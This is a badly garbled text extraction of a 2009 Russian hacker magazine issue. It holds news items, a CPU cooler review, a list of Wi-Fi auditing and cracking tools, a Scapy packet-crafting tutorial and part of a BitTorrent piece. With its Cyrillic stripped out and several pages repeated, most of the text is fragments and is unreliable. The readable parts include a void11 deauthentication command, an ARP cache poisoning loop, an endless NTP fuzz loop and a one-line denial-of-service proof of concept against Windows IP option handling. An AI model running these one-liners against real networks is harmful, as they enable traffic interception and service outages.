Вы находитесь на странице: 1из 150

!

LINUX FREEBSD

. 84

x 06 () 2009

: 210 .

- / USB-

06 (126) 2009

Flas

B
S
U

8
. 5

Win Server
CAPTCHA
2008 R2


. 114
126


-
. 54

12


Wi-Fi
. 24

OTH

02 (110) 2008

privatbankvip.com.ua
.62

. 58

@MAIL.
RU

C#

APPLE
.54

.32

. 118

PHPMYFAQ

. 74

. 66


ORACLE

. 26

. 74


WINDOWS

. 118

. 124

.78

WWW.XAKEP.RU

.50

CLAMAV
.80

03 (111) 2008

ERLANG:

GRID-
. 110

NAGIOS:


. 136

. 122

VPN

VPN-
WINDOWS
SERVER 2008
.122

WIND


SQL

. 56

. 26

ADOBE AIR


WEB
. 34


RING 0
. 110

SEO-

,
, .
,
, .
,

09 (117) 2008

Rustok.C


. 58

ICQ
. 74

HTTP

,
-

. 22 26, 29 30
: . , 18, 4
.
P. S. ,
- Red Bull
:).
nikitoz, . .

Im
Cu

CONTENT
06(126)
004 MEGANEWS

FERRUM

018
022


ASUS AIGURU SV1

PC_ZONE

028
034

-
Wi-Fi

042
048
054
058
064
068

088

EASY-HACK

092
098

102

108

RDP

114

118

Apple iPhone

X-TOOLS

126

074
078

BATTLE OF THE BRAINS


ACM ICPC 2009

,
140
twitter.com

jabber-
Python'


Common Lisp:

?

WINDOWS 7


Windows Server 2008 R2:




FreeBSD

070

SYN/ACK

Captcha-

FLASH

Linux FreeBSD

-

LinuxMCE:

Scapy
BitTorrent,

038

084

Asus

024

132
138
141
144

PSYCHO:

:
, , ?

FAQ UNITED

FAQ

8.5

WWW2

web-

064

Scapy

028
102

058

084
/

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)

Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

U i
>
Unix-
Ant
>

/PUBLISHING
>

119021, , . ,
. 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)
>





>

>
(strekneva@gameland.ru)
>

> -

>


(andrey@gameland.ru)
>


(devald@gameland.ru)
>


(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,


,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

.
:

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2009

WordPress
Magg.
.

>> meganews
J3

PC27

PC27

J3

MIFRILL / MIFRILL@R EAL.XAKEP.RU /


- (Washington
University in St. Louis, WUSTL) , , , .
USB-.
, ,
, Windows Mobile.
Microsoft , 100.000 .
, .
: - , ,
, USB-
$2000, $500.


, ,
. BTLS90 Filco
. ,
, , . ,
,
. BTLS90. , Nintendo Wii,
, . , ,
, Bluetooth ver2.1 Class 2,
10 . 800 dpi,
550 , USB.

NET
APPLICATIONS, LINUX


004

1%

X 06 /126/ 09

>> meganews
PC27


1999 , ,
CIH, , (Chen
Ing Hau). ,
.
( , , ), , , CIH
. ,
(CIH )
BIOS. , ,
CIH flash BIOS,
. ? ,
26- , ,

10 . . ,
, , ,
( )
Gigabyte Technology, .

@ 4- .
473 . 4 , 1536-

, .

2003 Nokia
Nokia 1100,
.
( :)),
, .
,
1100-
25.000 !

.
,
.
Nokia
( - ),
, .

SMS-,
, mTAN (mobile
Transaction Authentication Number),
SMS.
, Nokia 1100
,
IMEI
(International Mobile Equipment Identity)
IMSI (International Mobile Subscriber
Identity). , ,
sim
SMS. Nokia
,
, .

Google
Google
,
.

. ,
,
,
, ,
, .
,

006

Google
.
, ,
, . IT- ,
.
, ,
,
,
, .
X 06 /126/ 09

>> meganews
PC27

J3

Wikipedia

.
GNU Free
Documentation License (GFDL)
Creative Commons AttributionShareAlike (CC-BY-SA)
,
-
Wikimedia
Foundation.
17.462 75.8%.
, ,

. GFDL

, , ,
. ,
GFDL

.
CC-BY-SA, ,
,
, Wikipedia

. -
:
CC-BY-SA

CC-BY-SA.
.

500

. .

QIP
, IM ( QIP Quiet Internet Pager)
. QIP 2005 , Infium . ,
, - . ,
QIP http://mblogi.qip.ru, .
- . ,
, , . , 7- 8- ,
qip.ru , ,
. ,
, ? QIP
Inf, , \
. , , ,
:). . qip.ru 18- . . , Jabber Miranda,
. QIP ,
, , .

?

, , .
,
, . ?
. ( ) ,
-.
,
.

008

,
.
, . IP-, .
,
, , , . , ,
, .
, ,
.
X 06 /126/ 09

>> meganews



Dell
Intels
945GSE,

Latitude 2100.
, Dell
,
(


),
.
5: , , , .

: Intel Atom N270


1.6 ; 1 (
,
2 ); LED- 1024x576,
;
250 , SSD
16 ;
; WiFi-; , ,
- 3--1 SD\MMC
.
Windows XP Home, Windows Vista
Linux Ubuntu.
, ,
,
,
369 .

,

kremlin.ru, ,

. ,
,
! ,
10- , ,
voda_i_ryba .
- ,

.
, 15-

,
. -
: .. : .
.
. , . ,
.

DDoS-
The Pirate Bay . ,
-
, ,
. , ,
(
, ),
DDoS- Danowsky & Partners.
-. ,
, 1 .
,
, 2 . ,

, .
.
! , , DDo$-. Danowsky
& Partners , .

010

X 06 /126/ 09

>> meganews
PC27

Transcend Trend Micro -.


JetFlash V15 AntiVirus USB Flash Drive Trend Micro USB
Security. ,
, .
. -
Trend Micro USB Security 90 . ,
.

RU,

44%
-,
.

, ,
,
. , , 2007 , ,
, . ,
,
, , .
,
, ,
, . ,
,
25.000
($3000). , , , :
, - .
,
,
,
.

GOOGLE ,
,

200 .
012

X 06 /126/ 09

>> meganews
,

17%

X 05 /125/ 09


LG W53, SMART. Full HD 19201080,
16:9,
50.000:1 2 ,
Auto Bright, Time Control, Cinema Mode Live Sensor. ,

, ,
( ,
, ).
, ,
. Cinema Mode ,

, . Time Control,
, 1-2
, . ,
, Live Sensor

, . :
W2253V(21.5), W2253TQ(21.5) W2753V(27).
. 8000
.

013

>> meganews
PC27

Intel vs

AMD,

Intel AMD,
,
, .
,
. ,
2000 . AMD , Intel,
, ,
AMD. ,
.
Intel , , Intel
1.060 ,
.
,
, Intel .
,
,
, .
AMD , ,
: AMD
,
, Intel, ,
.

MCAFEE
,
IP-,
,

.

014

12



The Pirate
Bay. , ,
.
,
-

.
,

, TPB
.
,

.

, , TPB
,
. -

, ,
.


Amazon

, , , .
Amazon
Kindle Amazon Kindle 2.

6" 600800,

, . ,
,
Kindle2 ,
6- 9.7-
(Kindle DX), PDF.
E-Ink 16-
,
Kindle DX 1200x824.

Kindle
iPod.
, .


SD- .
-
2-
4- ,
.

Kindle
, .

Kindle2 ( ) , Amazon.com
, WiFi
.
, , -
,

, 6"
$359.00, 9.7" $489.00.

X 06 /126/ 09

>> meganews
PANDA SECURITY ,

67%

15 18

Windows 7

- Windows 7, , , ,

.
,
, Windows 7 RC .

Damballa, 30 . ,
, Windows 7 microsoft.com, .
, , , 2010
. Kaspersky
Lab. Kaspersky Anti-Virus 8.0 Windows 7.
, . , RC- Windows 7.

, , !
Flash , .
Adobe, , ,

. Adobe
.
NAB Show
Flash,
, Blu-ray .
, ,

X 05 /125/ 09

. Broadcom, Intel
STMicroelectronics,
Comcast, Disney Interactive New York Times.
, Flash,

. open Framework,

Flash-, .

015

, , , ,
.
, ? !
QWERTY-,
Nokia 5730 XpressMusic.



Pentium 133 8
,
,
, .
. -,
,

? ,
,

? ,
,

. ,
QWERTY-,
,
.
,
Windows
Mobile
,
Nokia 5730 XpressMusic.
!

-,
.



SMS .
, ,

( ), Python
.
,

8 ,
,
iPod,

-

. 3

, ,

,
. , Symbian

, Nokia 5730 XpressMusic
. ,


.
.

-, ,
... .
,
JBak TaskMan.
, ,
,
.

, ,
-,
,
.
, icq ? ,
Smaper
Slick,
, ICQ, Jabber, , , Google
Talk. , Slick,
, .


X-plore.
,
, \-
. ,

Bluetooth MMS!


,
.
SSH
PuTTY for
Symbian OS. RDP,
TSMobiles.
, Java-,
Nokia 5730
XpressMusic.

ShazamID ,
. ! - ,
, , ,
, . ShazamID ,
, , ,
!

( ), . Wi-Fi,
, Fring. - ( ),
, VoIP- .
? : VoIP-
( , Skype)
( ).
, ,
GSM, Wi-Fi.

Windows Mobile

CorePlayer. ,
,
-. ,

K-Lite Code Pack? Symbian
, CorePlayer
.


Bluetooth

EQ Bluetool Bluetooth.
-,
.
,
BTFramework
Windows
Bluetooth. ,
,
Bluesoleil, .

,
. Best Crypto 256-
. ,
, .
symvpn ,
PPTP- VPN-. , ,
.

, ,
, , S60 Feature Pack2 ,
OggPlay.
( .ogg, .oga, .flac , ,
.mp3), .
. , .

>> ferrum

, C
Zerotherm ZEN FZ120 (1800 /)
Zerotherm ZEN FZ120 (1400 /)
Xilence Black Hawk Edition (1400 /)
Xilence Black Hawk Edition (1800 /)
Thermalright Ultra 120 extreme (1400 /)
Thermalright IFX-14 (2 1400 /)
Thermalright IFX-14 (1 1400 /
Noctua NH-C12P (1400 /)
Ice Hammer IH-4405 (1650 /)
Ice Hammer IH-4405 (1400 /)


000

0 5 10 15 20 25 30 35 40 45 50

, . !
.



,
.
.
Intel,
Pentium III.
AMD,
(,
) , . .
,
( ,
) . ,
,
.
2004
-,
Thermaltake. , , 2007-.

:
Ice Hammer IH-4405
Thermalright IFX-14
Thermalright Ultra-120 eXtreme
Xilence Black Hawk Edition
Zerotherm ZEN FZ120
Noctua NH-C12P

018


,
.
, , .
2006 .
-, , ,
, .
.
; (
),

,
.
,
.
(,

:
: AMD Phenom X4 9950 Black Edition
: Foxconn A7DA-S ( AMD
790GX)
, : 1024, Corsair CM2X10248500C5
, : 500, Samsung HD501LJ
, : 720, Enermax EIN720AWT

, , ..) !


4- AMD
Phenom X4 9950,
140 . , , ,

, .
,
,
(
, , -).
: Noctua NT-H1.
S&M. 30
.
;
: 1400 /.
,

.
Lavalys
Everest. , . ,
.
X 06 /126/ 09

>> ferrum

, C
Zerotherm ZEN FZ120 (1800 /)
Zerotherm ZEN FZ120 (1400 /)
Xilence Black Hawk Edition (1400 /)
Xilence Black Hawk Edition (1800 /)
Thermalright Ultra 120 extreme (1400 /)
Thermalright IFX-14 (2 1400 /)
Thermalright IFX-14 (1 1400 /
Noctua NH-C12P (1400 /)
Ice Hammer IH-4405 (1650 /)
Ice Hammer IH-4405 (1400 /)


000

0 5 10 15 20 25 30 35 40 45 50

, . !
.



,
.
.
Intel,
Pentium III.
AMD,
(,
) , . .
,
( ,
) . ,
,
.
2004
-,
Thermaltake. , , 2007-.

:
Ice Hammer IH-4405
Thermalright IFX-14
Thermalright Ultra-120 eXtreme
Xilence Black Hawk Edition
Zerotherm ZEN FZ120
Noctua NH-C12P

018


,
.
, , .
2006 .
-, , ,
, .
.
; (
),

,
.
,
.
(,

:
: AMD Phenom X4 9950 Black Edition
: Foxconn A7DA-S ( AMD
790GX)
, : 1024, Corsair CM2X10248500C5
, : 500, Samsung HD501LJ
, : 720, Enermax EIN720AWT

, , ..) !


4- AMD
Phenom X4 9950,
140 . , , ,

, .
,
,
(
, , -).
: Noctua NT-H1.
S&M. 30
.
;
: 1400 /.
,

.
Lavalys
Everest. , . ,
.
X 06 /126/ 09

>> ferrum
3100 .

Ice Hammer
IH-4405

1200 .

Thermalright
IFX-14

: AMD Socket AM2/AM2+, Intel LGA775


:
: 5
, : 6
, : 120
, /: 1000-2000
: 19-32
, CFM: 55.6-80.1
PWM:
, : 125x105x150
, : 798

: AMD Socket AM2/AM2+, Intel LGA775/


LGA1366 ( . )
:
: 4
, : 8
, : 3x 120 ( )
, /: n/a
: n/a
, CFM: /na
PWM: n/a
, : 146x126x161
, : 790

. -, HDT (Heatpipe-Direct-Touch),
,
.
. ,
.
850 1650 / (, ,
). ,
, .
. !.. : 7.5 /(*),
0.06 / ,
25% .

.
X 06 /126/ 09

. 36
(!) 120
.
( ), IFX-10
. IFX-14 120
Antec TriCool LED , , .
IFX-10 , ,
.

IFX-10, .
.

019

>> ferrum
3100 .

Ice Hammer
IH-4405

1200 .

Thermalright
IFX-14

: AMD Socket AM2/AM2+, Intel LGA775


:
: 5
, : 6
, : 120
, /: 1000-2000
: 19-32
, CFM: 55.6-80.1
PWM:
, : 125x105x150
, : 798

: AMD Socket AM2/AM2+, Intel LGA775/


LGA1366 ( . )
:
: 4
, : 8
, : 3x 120 ( )
, /: n/a
: n/a
, CFM: /na
PWM: n/a
, : 146x126x161
, : 790

. -, HDT (Heatpipe-Direct-Touch),
,
.
. ,
.
850 1650 / (, ,
). ,
, .
. !.. : 7.5 /(*),
0.06 / ,
25% .

.
X 06 /126/ 09

. 36
(!) 120
.
( ), IFX-10
. IFX-14 120
Antec TriCool LED , , .
IFX-10 , ,
.

IFX-10, .
.

019

>> ferrum
2870 .

2100 .

Thermalright
Ultra-120 eXtreme
:
: AMD Socket AM2/AM2+, Intel LGA775/
LGA1366 ( . )
:
: 6
, : 6
, : 120 ( )
, /: : n/a
, CFM: n/a
PWM: n/a
, : 63x132x161
, : 790

Xilence Black
Hawk Edition
:
: AMD Socket AM2/AM2+/939/940/754,
Intel LGA77
:
: 6
, : 6
, : 120
, /: 1800
: 23
, CFM: 78.31
PWM:
, : 155x143x144
, : 876

Thermalright IFX-14:
, .
, . .
, IFX-14 c
.
Intel LGA775 AMD Socket AM2+,
.
LGA1366, AMD Socket 939 Intel
Xeon. $10 ( , , ).

8-
.
, 120 , , , .
. PWM.
40 !
, ,
. .

.
-, ,
.

LGA1366 (, , ,
AMD).
(1800 /) 23
78.31 CFM.

020

X 06 /126/ 09

>> ferrum
3200 .

2569 .

Zerotherm
ZEN FZ120

Noctua
NH-C12P
:

:
: Intel LGA775, AMD Socket AM2/
AM2+/939/940
:
: 4
, : 6
, : 120
, /: 1100-1800
: 19.5-31.4
, CFM: 59.48
PWM:
, : 126x61x156
, : 670

:
.
, . . ,
, , ,
. PWM, . AM2+
. , Intel
- ,
. ,
.
.

: AMD Socket AM2/AM2+, Intel LGA775/


LGA1366 ( . )
:
: 6
, : 6
, : 120
, /: 1300
: 12.6
, CFM: 92.3
PWM:
, : 114x126x152
, : 730

, , . , , : .
,
.
. ( ). ,
, ,
( ,
).
.

.
.

- .
,
.
X 06 /126/ 09

Thermalright IFX-14,
.

Ice Hammer IH-4405


. , . z

021

>> ferrum

ASUS
AiGuru SV1

:
: LCD 7, 800x480
: VGA, 640480
: Ethernet, 802.11 b/g
: 202 x 123 x 253
: 1,6

10000 .

022

X 06 /126/ 09

>> ferrum
Skype , . - :
, ,
, . , ASUS
.
?
ASUS AiGuru
SV1
-
Skype.
,
,
,
.
web-
.
,
.
,
:
.

,
.
,

.
,

. ,
,
.

Skype :
, ,
,

.


.

ASUS AiGuru SV1 Ethernet-.

X 06 /126/ 09

, .

,
.
( ,
),
.

,

. :


, .

,
,
.

. Wi-Fi
. ,
.
:
DHCP


. ,

.
.

.
, , ,
. ,


. ,

,
,

.
,
.

:
,
.


(
, ,

).

,
.
.
,

.
,

.
,
.


(
,
). ?
,

.
,
.

, ,
,
.
, ,
. ,

,

? ,
,
,

.
,


:
,

. ,
,

,
,

.



,
.

,
.

,
.
,
Wi-Fi

. , ,
, ,
,
, , .
,

,

. z

023

15
TOOLS

15
TOOLS

>> pc_zone

15
TOOLS
15
TOOLS
15
TOOLS

15
TOOLS

15
TOOLS

15
TOOLS

15
TOOLS

15
TOOLS

15
15
TOOLS
TOOLS

15
TOOLS

15
TOOLS

15
TOOLS

12 TOOLS

z .
, , , .
. , . .

15
TOOLS

15
TOOLS

15
TOOLS

15
TOOLS

15
TOOLS15
15
TOOLS
TOOLS

Netstumbler
www.stumbler.net


.

, SSID
,
GPS.

AP- log-,

Google KML

Google Maps
Google Earth.
Netstumbler
, .. ,

. ,
LC/SNAP-, ,
IDS-. ,
(hidden) , ( ). ,
Netstumbler
, .
,
Vista -
. ,
,

024

NETSTUMBLER
, -
.

Vistumbler
www.vistumbler.net

, / Vista Win7? ,

.
netsh:
netsh wlan show networks mode=bssid.
Andrew Calcutt -

GUI-,

AP-,
GPS. ,
, ,
iwlist.
, Vistumbler
AutoIt (

! #107 z),
, X 06 /126/ 09

15
TOOLS

15
TOOLS
15
TOOLS

15
TOOLS

15
TOOLS

15
TOOLS

15
TOOLS

15
TOOLS
15
TOOLS
15
TOOLS

15
TOOLS

>> pc_zone

15
TOOLS

15
TOOLS

15
TOOLS

Wi-Fi
.

Kismet
www.kismetwireless.net

15
TOOLS

15
TOOLS

15
TOOLS

15
TOOLS

. Vistumbler ,
,
MAC- ,
.

KML

Google Earth.

,

. ,
Netstumbler ,
.

inSSIDer
www.metageek.net/
products/inssider

,
, . Kismet
Netstumbler ,
(
).

,
, (nonbeaconing) , , .
Kismet
IP-, TCP, UDP, ARP DHCP ,
Wireshark/
TCPDump
( GPS,
, ).
, 5
, -
. ,
Kismet-2009-05-RC1,
(- ncurse),

, Netstumbler

64- XP, Charles Putney

Wi-Fi , -

15
TOOLS

15
TOOLS

15
TOOLS
15
TOOLS
15
TOOLS


airodump (
802.11), aireplay ( Wi-Fi
), aircrack ( WEP
WPA-PSK), airdecap ( WEP/WPA ).
WEP
:
, aircrack-ng

WEP-. Aircrack-ng
:
PTW-:

, WEP-.
arp-, , , ;
FMS / KoreK .
(FMS, KoreK, Brute force)
WEP-
, PTW-;

WEP- : AIRCRACKNG

,
VISTA/WIN7

The Code Project. Norman
Rasmussen,
inSSIDer,
Native Wi-Fi API.
Netstumbler
,
,

. ,
X 06 /126/ 09

,

,
, .
, , CACE , , Wi-Fi Cace AirPcap.

Aircrack-ng
aircrack-ng.org

Aircrack-ng 802.11 WEP


(Wired Equivalent Privacy) Encryption
WPA/WPA2-PSK WiFi-.


KISMET, 5
(word list), , , WPA/WPA2 .
Aircrack-ng Linux,
. ,
DLL
Wi-Fi .

025

>> pc_zone

INFO

info

Wi-Fi
.

,
,
, PSP.

WifiSniffer
http://
www.psp-hacks.com/
file/337.

DVD
dvd

x-toolz

:
DVD-

HTTP://WWW
links

wardriving
Slitaz Aircrack-ng
Distribution:
http://aircrackng.org/doku.
php?id=slitaz
BackTrack:
www.remote-exploit.
org

026

-
? , MAC-


MAC-

Technitium
www.technitium.com

, MAC-
-
. ,
, ,
:). AP
, .
MAC-
. MAC Airodump, . MAC-
macchanger. , , SMAC (www.klcconsulting.
net/smac) Technitium.

MAC-. , (
ipconfig /all ) .
, ,
. Void1 .

void11
http://wirelessdefence.org/Contents/
Void11Main.htm

Void11
, , , .
(
).
, .
, , MAC-
MAC-.
, Windows ,
:
void11_penetration s _MAC B
MAC__ D wlan0.

Asleap
www.willhackforsushi.com/Asleap.html

CISCO
Vendor ( )
CISCO, LEAP (Lightweight Extensible Authentication
Protocol), - .

,
REQUEST, EAP-CISCO Wireless (LEAP). LEAP ,
, !
Windows ,

Aironet Client Utilities (http://rorschach.concordia.ca/neg/
remote_access/wireless/general_info/acu.html).
? ! , ,
LEAP-.
Joshua Wright ASLEAP
(http://asleap.sourceforge.net). ,
.
Linux,
(,
)

WIFIZOO
WifiZoo, ,
Wi-Fi .
.
Python ( , ,
Scapy,
),

. (SSID),
X 06 /126/ 09

>> pc_zone

WIRELESSKEYVIEW
,
( ), ( )
,
: (pop3/ftp/telnet), , http
, ..
WifiZoo Channel hopping,
,
.


COMMVIEW

Kismet.
logs/,
(ssids.log, cookies.log, httpauth.log ..).

GUI-, ,
127.0.0.1:8000.

COMMVIEW FOR WIFI

www.tamos.ru/
products/commwifi


CommView,

802.11a/b/g/n.
,

. ,
WEP WPA-PSK
X 06 /126/ 09

( 70).

TCP- , , HTTP ,
.
.
,
, .

, WPA

,


, ,
. ,
.

WIRELESS SECURITY
AUDITOR

www.elcomsoft.ru

,
. Wireless Security Auditor
(,
! :)) WPA/
WPA2, .
,

GUI , WIFIZOO
, WSA ,
. ,
,

( TCPDUMP,
CommView, PSPR), .. . ,
,
: NVIDIA (GeForce 8, 9, 200
) ATI (RADEON HD 3000 Series
). EWSA
(, password
p@ssword ..)

WIRELESSKEYVIEW

www.nirsoft.net/utils/
wireless_key.html

,
. ,
? ,
? .

WirelessKeyView,
WEP/
WPA . , WirelessKeyView
Wireless Zero
Configuration WinXP, WLAN
AutoConfig,
. z

027

>> pc_zone

apy

Scapy

Scapy

Scapy
Scapy

Scapy

Scapy
Scapy

Scapy

Scapy
STEP
/ STEP@GAMELAND.RU /


Scapy

SCAPY
,
? Scapy , .
, , . , , .
>> pc_zone

Scapy .
,
Python,
:

.
,
, nmap,
arpspoof, arp-sk, arping, tcpdump, tethereal,
p0f.
.
, Scapy
.
, -

028


,
Python.
,
,

Python, : ,
!
!.

!
,
.
, , -

, . ,
,
Linux ,

.
, , Python.

. -, Scapy
Python, 3. . ,
-,
,
2.5 .
X 06 /126/ 09

>> pc_zone
Scapy

ICMP-
TCP/IP-
22 .

SCAPY
,
PYTHON


Scapy
Sr 3

sr1 3

srp 2

srp1 3

sniff
p0f fingerprint
arpcachepoison ARP-
send 3
sendp 2
traceroute TCP traceroute
arping ARP-ping
nmap_fp fingerprint nmap

,
,
.

, 100% . ,

,
( , , DVD):
Scapy ;
Python 2.5 (www.python.org);
pywin32
(python.net/crew/mhammond/win32);
WinPcap
4.02 (www.winpcap.org);
pypcap Pcap
(code.google.com/p/pypcap);
libdnet (code.google.com/p/libdnet);
pyreadline (ipython.scipy.org/moin/
PyReadline/Intro);
X 06 /126/ 09

,
Scapy.
.



Python-, Scapy
: scapy.py ( python
scapy.py). ,
.
, Python,
Scapy. ls(),
, :
>>> ls( )
ARP
BOOTP
DNS
...

: ARP
: BOOTP
: DNS

,

:
1. ,
- ,
.
2. Scapy
OSI: . , DNS
UDP- (
DNS
UDP), UDP- IP-,

Ethernet-. ,
, Scapy.
,
, ,
Python/Scapy .
,
.

>>> a=IP( ) (1)


>>> a
<IP |>
>>> a.ttl (2)
64
>>> a.ttl=32 (3)
>>> a
<IP ttl=32 |>
>>> b=TCP(dport=22) (4)
>>> c=a/b (5)
>>> c
<IP frag=0 ttl=32 proto=TCP
|<TCP dport=ssh |>>

(1) IP- . , IP-



Scapy. ,

.
, (2).
32 (3)
, .
TCP-,
b
dport ( ) 22.
a b,
/, TCP/
IP-,
c. ,
IP , TCP-.
,


,
(
)! ,

,
:
a=Ether()/IP(dst="www.xakep.ru)/
TCP()/"GET /index.html HTTP/1.0
\n\n"


,
Ethernet.

029

>> pc_zone

Scapy
Scapy

apy
Scapy
WARNING
warning
, ,
Scapy
.
, ,

Python
,
.

6 /
,
. ,



.

DVD
dvd
,
Scapy,

DVD.

(, DNS-),

Python-

Scapy .

Scapy

3D-
TRACEROUTE



, .
,
TCP- ,
-. ,
, ,
. ,
, .
>>> pkts = IP(ttl=[1,3,5,(7,10)])/TCP( )
>>> pkts
<IP frag=0 ttl=[1, 3, 5, (7, 10)]
proto=TCP |<TCP |>>
>>> [pkt for pkt in pkts]
[<IP frag=0 ttl=1 proto=TCP |<TCP |>>,
<IP frag=0 ttl=3 proto=TCP |<TCP |>>,
<IP frag=0 ttl=5 proto=TCP |<TCP |>>,
<IP frag=0 ttl=7 proto=TCP |<TCP |>>,
<IP frag=0 ttl=8 proto=TCP |<TCP |>>,
<IP frag=0 ttl=9 proto=TCP |<TCP |>>,
<IP frag=0 ttl=10 proto=TCP |<TCP |>>]

TCP/IP- TTL 1, 3, 5, 7, 8, 9 10.


>>> IP(dst="192.168.*.1-10")/ICMP( )
<IP frag=0 proto=ICMP dst=<Net 192.168.02.*> |<ICMP |>>

ICMP-
192.168.
>>> IP(dst="192.168.4.0/24")/
TCP(dport=(0,1024))
<IP frag=0 proto=TCP dst=<Net
192.168.4.0/24> |<TCP dport=(0, 1024) |>>

, TCP SYN
( 0 1024) 192.168.4.0/24. ,
-

030

.
TCP,
TCP-,
, . IP- ICMP, TCP
ARP, TCP-,
ICMP- ARP-.
TTL, traceroute. ,
, .

-
,
.
, , .
, Scapy
OSI, . send()
3 :
.
:
send(IP(dst="1.2.3.4")/ICMP())

sendp() ,

.
SEND(IP(DST=1.2.3.4)/ICMP())
>>> sendp(Ether()/
IP(dst="1.2.3.4",ttl=(1,4)), iface="eth1")
....
Sent 4 packets.

, ,
, .
Scapy
(send) (recieve)
sr(). :
;
,
. sr1()
,
. ,
, (IP, ARP).
X 06 /126/ 09

>> pc_zone
Scapy
A.
CLOUD
COMPUTING

:
>>> for s,r in ans:
... if s[TCP].dport == r[TCP].
sport:
... print str(s[TCP].dport) + "
CLOUD
is
unfiltered"

COMPUTING

ARP PING

, ,
.
, :


Ethernet,
802.3, srp().


, ,
Scapy.
. ,
TCP- ,
. ,

>>> for s in unans:


... print str(s[TCP].dport) + "
is filtered"




.

ARP Ping (
arping). ,

Pyx MikTex, Scapy


2D- PDF:

>>> a,u=traceroute([www.python.org, google.com,slashdot.org])


>>> a.trace3D()

Scapy ,
Nmap Queso ( :


:
>>> ans.summary(lambda (s,r):
r.sprintf("%IP.src% is alive") )

>>> ans,unans=sr(
IP(dst="192.168.1.*")/
TCP(dport=80,flags="S") )

ARP cache poisoning,



,
SSL. ,
ARP- ,
. :
>>> send( Ether(dst=clientMAC)/
ARP(op="who-has", psrc=gateway,
pdst=client),
inter=RandNum(10,40), loop=1 )

>>> nmap_fp(192.168.0.1)
Begin emission:
Finished to send 8 packets.

Received 19 packets, got 4 answers, remaining 4 packets


(0.88749999999999996, [Draytek Vigor 2000 ISDN router])

X 06 /126/ 09

>>>
ans,unans=sr(IP(dst="192.168.1.1254")/ICMP())

ARP-

3D-.
VPython :

Scapy
arping(), .
: arping(192.168.1.*)

, , ICMP-:

, .

>>> p=IP()/ICMP()
>>> p.pdfdump(test.pdf)

>>> ans,unans =
sr(IP(dst="www.xakep.com")/
TCP(dport=[80,666],flags="A"))

ans.summary(lambda (s,r):
r.sprintf("%Ether.src% %ARP.
psrc%") )

ICMP ,
TCP
Ping, , TCP SYN:

.
ACK-
:


ARP- :

ARP
MAC-
IP-. ARP Ping
, IP-:
>>> ans,unans=srp(Ether(dst="ff:
ff:ff:ff:ff:ff")/ARP(pdst="192.16
8.1.0/24"),timeout=2)

, Scapy
arpcachepoison (), MAC-,
IP .

FUZZING
, :
-
, , , . ,
- -

031

>> pc_zone

apy
Scapy


/ ALEX.RAIDEN@GMAIL.COM /

Scapy


ARP , SCAPY PYTHON

Cloud Computing
1,2,3,

5 .
HTTP://WWW
links
Scapy
IPv6: namabiiru.
hongo.wide.ad.jp/
scapy6
Unit-
Scapy: secdev.org/
projects/UTscapy.

Wifi:
sid.rstack.org/index.
php/Wifitap_EN.

? ?

, Scapy fuzz(), , .
,
( ,
, )
,
. :
>>> send(IP(dst="target")/fuzz(UDP()/
NTP(version=4)),loop=1)

IP- ,
UDP NTP (, ,
) .
UDP- ,
123 ( NTP), NTP
4 (.. ). .

WinPcap
: Scapy
. sniff (),
, . ,
. ICMP-, 66.35.250.151:
>>> sniff(filter="icmp and host
66.35.250.151", count=2)
<Sniffed: UDP:0 TCP:0 ICMP:2 Other:0>
>>> a=_
>>> a.nsummary()
0000 Ether / IP / ICMP 192.168.5.21 echorequest 0 / Raw

032

0001 Ether / IP / ICMP 192.168.5.21 echorequest 0 / Raw

,
,
,
. .
, , .
a,
,
: , a[1]. nsummary(), ,
.
GUI Wireshark.
PCAP: wrpcap(temp.cap,pkts). : pkts = rdpcap(temp.cap).

!
Scapy ,
. Proof of concept DoS Microsoft
IP 115 C, Scapy
:
send(IP(dst="target",options="\x02\
x27"+"X"*38)/TCP())

Scapy , .
.
fingerprint? . , ,
? , IDS .
. . Scapy
Python-
! z
X 06 /126/ 09

>> pc_zone
TORRENT
TRACKER
DATA
Hash
function

DFCD3454

SOME DATA 2

Hash
function

52ED879E

SOME DATA 3

Hash
function

46042841

SOME DATA 1

DISTRIBUTED
NETWORK

KEY

PEERS

/ GLEB.POLI@GMAIL.COM /

BITTORRENT,

>> pc_zone

.
, , , , FTP-
- .
BitTorrent , . , .

.
, - -.
, ,

. !

034

torrent.

.


.
(, uTorrent),
,
.
, , ,

.

BitLet (www.bitlet.org).
:
,
Download torrent
. ,
.
Java-,
Torrent-.
: X 06 /126/ 09

>> pc_zone

,
Java VM.



,
- .
Demonoid.
,
. ,

.

.
, ,
,
- .
, ,
.
,
Trackerchecker.org
www.opentrackers.fr. :
, - ,
.
opentrackers.

(
),
. ,

RSS-, .
,
(, Demonoid FileList.org),

.
- ,
-

-

UTORRENT,

. ,

www.zeropaid.com.


, . ,
-
. BitTorrent
, ,
.
.
DHT ,
. DHT (Distributed Hash Table, -)
p2p-, BitTorrent
.
, ,
. ,
.
:
,
DHT. , Torrent DHT, Mainline
BitComet, , , Azureus.
, DHT
.

, , , , - ?
, .
:
, ( .torrent)
www.torrentspam.com.
. Baratro (baratro.ru), -
, ,
, .

X 06 /126/ 09

OPENTRACKERS
,

. . ,

RPD-,
. ,
-
,
-. uTorrent
- WebUI (http://forum.utorrent.
com/viewforum.php?id=20).

WebUI uTorrent . , - ,

, , ,
. , , : ,
-, http://<
ip>:< >/gui/.
, ,

( Opera Mini).
,
.

- DynDNS- (,
dyndns.com), IP
- moitorrent.dyndns.com.
, WebUI
2008
. ,
.

WebUI WIP,
uTorrent MiniUI,
,
.

JABBER BITTORRENT
, -
uTorrent.

035

>> pc_zone
WARNING
warning

, BitTorrent

.
,
,

,
.


.

DVD
dvd


,

.

UREMOTE WEBUI,
RSS,
